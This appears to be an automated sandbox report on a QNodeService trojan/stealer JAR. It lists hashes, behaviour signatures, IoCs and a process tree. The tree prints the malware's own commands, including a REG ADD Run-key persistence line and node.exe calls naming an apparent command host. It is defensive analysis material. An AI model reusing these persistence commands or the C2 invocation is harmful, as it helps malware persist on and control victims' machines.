Analysis
-
max time kernel
44s -
max time network
134s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
05-10-2020 13:15
Static task
static1
Behavioral task
behavioral1
Sample
7a3e76834b35ee6af8e613d5c36702bf.jar
Resource
win7
Behavioral task
behavioral2
Sample
7a3e76834b35ee6af8e613d5c36702bf.jar
Resource
win10v200722
General
-
Target
7a3e76834b35ee6af8e613d5c36702bf.jar
-
Size
480KB
-
MD5
7a3e76834b35ee6af8e613d5c36702bf
-
SHA1
a9d778572c8e1781b538c52cadad10ccea997213
-
SHA256
f0ac0142e6219a8f63b31bdf40f88f7cd0a2ebfcd111a581e0d5d48f6d9c4781
-
SHA512
828f83b211bd00852bf430d465e8754690c14944a9697389953954bede19095926e6bfe3a273c7478de277063c83601881b602682f844674fd6bbd50eee6b827
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3224 node.exe 3952 node.exe 3992 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac3944c9-187a-4e45-a7fe-d665ba61ffd2 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad76-168.dat js behavioral2/files/0x000100000001ad76-171.dat js behavioral2/files/0x000100000001ad76-175.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3224 node.exe 3224 node.exe 3224 node.exe 3224 node.exe 3952 node.exe 3952 node.exe 3952 node.exe 3952 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe 3992 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2748 3056 java.exe 74 PID 3056 wrote to memory of 2748 3056 java.exe 74 PID 2748 wrote to memory of 3224 2748 javaw.exe 78 PID 2748 wrote to memory of 3224 2748 javaw.exe 78 PID 3224 wrote to memory of 3952 3224 node.exe 80 PID 3224 wrote to memory of 3952 3224 node.exe 80 PID 3952 wrote to memory of 3992 3952 node.exe 81 PID 3952 wrote to memory of 3992 3952 node.exe 81 PID 3992 wrote to memory of 1820 3992 node.exe 83 PID 3992 wrote to memory of 1820 3992 node.exe 83 PID 1820 wrote to memory of 3740 1820 cmd.exe 84 PID 1820 wrote to memory of 3740 1820 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\7a3e76834b35ee6af8e613d5c36702bf.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\8e27a50c.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain multimeda.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_qe1aN6\boot.js --hub-domain multimeda.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_qe1aN6\boot.js --hub-domain multimeda.com5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ac3944c9-187a-4e45-a7fe-d665ba61ffd2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ac3944c9-187a-4e45-a7fe-d665ba61ffd2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3740
-
-
-
-
-
-